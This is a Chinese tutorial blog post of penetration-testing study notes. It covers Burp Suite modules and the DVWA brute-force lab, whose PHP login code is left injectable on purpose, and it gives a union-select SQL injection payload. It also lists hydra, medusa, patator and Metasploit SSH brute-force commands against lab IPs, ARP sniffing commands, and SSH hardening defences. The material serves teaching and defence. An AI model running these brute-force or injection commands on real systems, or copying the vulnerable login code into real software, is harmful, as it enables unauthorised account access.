scanner 扫描模块用于自动化检测漏洞,分为主动和被动扫描
intruder 入侵模块根据上面检测到的可能存在漏洞的链接,调用攻击载荷,对目标链接进行攻击
入侵模块的原理是根据访问链接中存在的参数/变量,调用本地词典、攻击载荷,对参数进行渗透测试
repeater 重放模块用于实现请求重放,通过修改参数进行手工请求回应的调试
sequencer 序列器模块用于检测参数的随机性,例如密码或者令牌是否可预测,以此判断关键数据是否可被伪造
decoder 解码器模块用于实现对URL、HTML、Base64、ASCII、二八十六进制、哈希等编码转换
comparer 对比模块用于对两次不用的请求和回应进行可视化对比,以此区分不同参数对结果造成的影响
extender 通过拓展模块,可以加载自己开发的、或者第三方模块,打造自己的burpsuite功能
通过burpsuite提供的API接口,目前可以支持Java、Python、Ruby三种语言的模块编写
options 分为project/user options,主要对软件进行全局设置
alerts 显示软件的使用日志信息
网页密码暴力破解[低]
burp suite
查看源码:
<?php
if( isset( $_GET['Login'] ) ) {
$user = $_GET['username'];
$pass = $_GET['password'];
$pass = md5($pass);
$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
$result = mysql_query( $qry ) or die( '<pre>'%20. mysql_error() . '</pre>'%20);
if( $result && mysql_num_rows( $result ) == 1 ) {
// Get users details
$i=0; // Bug fix.
$avatar = mysql_result( $result, $i, "avatar" );
// Login Successful
echo "<p>Welcome to the password protected area " . $user . "</p>";
echo '<img src="'%20. $avatar . '" />';
} else {
//Login failed
echo "<pre><br>Username and/or password incorrect.</pre>";
}
mysql_close();
}
?>
代码很简单,用户输入账号密码后,将用户的密码进行MD5加密,从数据库中找相应的账号密码与之对比,相与为1的话输出用户名和头像。
我们随便输入账号密码,用burpsuite拦截数据包。在burpsuite中右键将包发送至intruder模块。进入intruder的positions模块,选择需要爆破的变量,需要爆破的变量前后面都加$,选择攻击类型:
Sniper – 这个是我们最常用的,Sniper是狙击手的意思。这个模式会使用单一的payload【就是导入字典的payload】组。它会针对每个position中$$位置设置payload。这种攻击类型适合对常见漏洞中的请求参数单独地进行测试。攻击中的请求总数应该是position数量和payload数量的乘积。
Battering ram – 这一模式是使用单一的payload组。它会重复payload并且一次把所有相同的payload放入指定的位置中。这种攻击适合那种需要在请求中把相同的输入放到多个位置的情况。请求的总数是payload组中payload的总数。简单说就是一个playload字典同时应用到多个position中
Pitchfork – 这一模式是使用多个payload组。对于定义的位置可以使用不同的payload组。攻击会同步迭代所有的payload组,把payload放入每个定义的位置中。比如:position中A处有a字典,B处有b字典,则a【1】将会对应b【1】进行attack处理,这种攻击类型非常适合那种不同位置中需要插入不同但相关的输入的情况。请求的数量应该是最小的payload组中的payload数量
Cluster bomb – 这种模式会使用多个payload组。每个定义的位置中有不同的payload组。攻击会迭代每个payload组,每种payload组合都会被测试一遍。比如:position中A处有a字典,B处有b字典,则两个字典将会循环搭配组合进行attack处理这种攻击适用于那种位置中需要不同且不相关或者未知的输入的攻击。攻击请求的总数是各payload组中payload数量的乘积。
选择cluster bomb,再在payloads模块的payload options添加字典。爆破出结果。
第二种方法是SQL注入,从源码看到没有对username和password进行过滤。当试到6个字段的时候,它说成功进入:
' union select 1,2,3,4,5,6 -- d
Welcome to the password protected area ' union select 1,2,3,4,5,6 -- d
网页密码暴力破解[中]
查看源码:
<?php
if( isset( $_GET[ 'Login'%20] ) ) {
// Sanitise username input
$user = $_GET[ 'username'%20];
$user = mysql_real_escape_string( $user );
// Sanitise password input
$pass = $_GET[ 'password'%20];
$pass = mysql_real_escape_string( $pass );
$pass = md5( $pass );
$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
$result = mysql_query( $qry ) or die( '<pre>'%20. mysql_error() . '</pre>'%20);
if( $result && mysql_num_rows($result) == 1 ) {
// Get users details
$i=0; // Bug fix.
$avatar = mysql_result( $result, $i, "avatar" );
// Login Successful
echo "<p>Welcome to the password protected area " . $user . "</p>";
echo '<img src="'%20. $avatar . '" />';
} else {
//Login failed
echo "<pre><br>Username and/or password incorrect.</pre>";
}
mysql_close();
}
?>
mysqli_real_escape_string()会将转义特殊字符,一定程度上防止SQL注入。 所以用[低]的burpsuite方法解决。
网页密码暴力破解[高]
查看源码:
<?php
if( isset( $_GET[ 'Login'%20] ) ) {
// Sanitise username input
$user = $_GET[ 'username'%20];
$user = stripslashes( $user );
$user = mysql_real_escape_string( $user );
// Sanitise password input
$pass = $_GET[ 'password'%20];
$pass = stripslashes( $pass );
$pass = mysql_real_escape_string( $pass );
$pass = md5( $pass );
$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
$result = mysql_query($qry) or die('<pre>'%20. mysql_error() . '</pre>'%20);
if( $result && mysql_num_rows( $result ) == 1 ) {
// Get users details
$i=0; // Bug fix.
$avatar = mysql_result( $result, $i, "avatar" );
// Login Successful
echo "<p>Welcome to the password protected area " . $user . "</p>";
echo '<img src="'%20. $avatar . '" />';
} else {
// Login failed
sleep(3);
echo "<pre><br>Username and/or password incorrect.</pre>";
}
mysql_close();
}
?>
还是可以用burpsuite解决,但每次登录失败都要sleep3秒,大大降低破解速度。
SSH密码暴力破解
hydra
世界顶级密码暴力密码破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被破解关键取决于破解字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具。
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
hydra -L logins.txt -P pws.txt -M targets.txt ssh -o ssh-hydra.ok
medusa
速度快,支持大规模并行,模块化,爆破登录,可以同时对多个主机、用户或密码执行强力测试。medusa和hydra一样,同样属于在线密码破解工具。不同的是,medusa的稳定性相较于hydra要好很多,但其支持模块要比hydra少一些。
medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
medusa -M ssh -H hostlist.txt -U userlist.txt -P passlist.txt -O ssh.log
patator
patator ssh_login host=192.168.137.147 user=root password=FILE0 0=passlist.txt -x ignore:mesg='Authentication failed'
brutespray
brutepray是一款基于nmap扫描输出的gnmap/XML文件,自动调用medusa对服务进行爆破。
kali安装brutespray
apt-get update
apt-get install brutespray
brutespray语法参数
-f FILE, --file FILE GNMAP, JSON or XML file to parse
-o OUTPUT, --output OUTPUT
Directory containing successful attempts
-s SERVICE, --service SERVICE
specify service to attack
-t THREADS, --threads THREADS
number of medusa threads
-T HOSTS, --hosts HOSTS
number of hosts to test concurrently
-U USERLIST, --userlist USERLIST
reference a custom username file
-P PASSLIST, --passlist PASSLIST
reference a custom password file
-u USERNAME, --username USERNAME
specify a single username
-p PASSWORD, --password PASSWORD
specify a single password
-c, --continuous keep brute-forcing after success
-i, --interactive interactive mode
-m, --modules dump a list of available modules to brute
-q, --quiet supress banner
msf
metasploit framework是一个编写、测试和使用exploit代码的完善环境。这个环境为渗透测试,shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的perl编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。
1. SSH模块
┌──(root?kali)-[~]
└─# msfconsole
msf6 > search ssh
2. SSH用户枚举
msf6 > use auxiliary/scanner/ssh/ssh_enumusers
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 192.168.137.147
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /root/userlist.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run
3. SSH版本探测
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.137.147
msf6 auxiliary(scanner/ssh/ssh_version) > run
4. SSH暴力破解
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.137.147
msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE /root/userlist.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/passlist.txt
msf6 auxiliary(scanner/ssh/ssh_login) > run
暴力破解防御
1.sueradd shell[推荐]
useradd v5le0n9 -s /sbin/nologin
2.密码的复杂性[推荐]
字母大小写+数字+特殊字符+20位以上+定期更换
3.修改默认端口[推荐]
/etc/ssh/sshd_config
port 22222
4.限制登录的用户或组[推荐]
#permitrootlogin yes
allowusers v5le0n9
man sshd_config
allowusers allowgroups denyusers denygroups
5.使用sudo,不用root用户[推荐]
6.设置允许的IP访问[可选]
/etc/hosts.alllow,例如sshd:192.168.137.147:allow
PAM基于IP限制
iptables/firewalld
只能允许从堡垒机访问
7.使用denyhosts自动统计,并将其加入到/etc/hosts.deny
8.基于PAM实现登录限制[推荐]
模块:pam_tally2.so
功能:登录统计
示例:实现防止对sshd暴力破解
grep tally2 /etc/pam.d/sshd
auth required pam_tally2.so deny=2 even_deny_root root_unlock_time=60 unlock_time=6
9.禁用密码改用公钥方式认证
/etc/ssh/ssh_config
passwordauthentication no
10.保护shell导出会话文件[小心]
11.GRUB加密[针对本地破解]
中间人攻击
利用ARP,ARP是地址解析协议,将IP地址转化为MAC地址。
kali抓包
tcpdump -i eth0 -nn arp and host 192.168.137.147 抓ARP协议包
ettercap -G 图形化
使用静态IP/MAC防止中间人攻击(windows下)
netsh i i show in 查看本地网络IDX值
netsh -c "i i" add ne idx值 192.168.137.147 00-aa-00-62-6-c6-09 永久绑定
arp -a 查看是否绑定成功
netch -c "i i" delete neighbors idx值 删除绑定的IP/MAC
Linux下
arp -s 192.168.137.147 00-aa-00-62-6-c6-09
版权声明:本文为Leong_Vinson原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。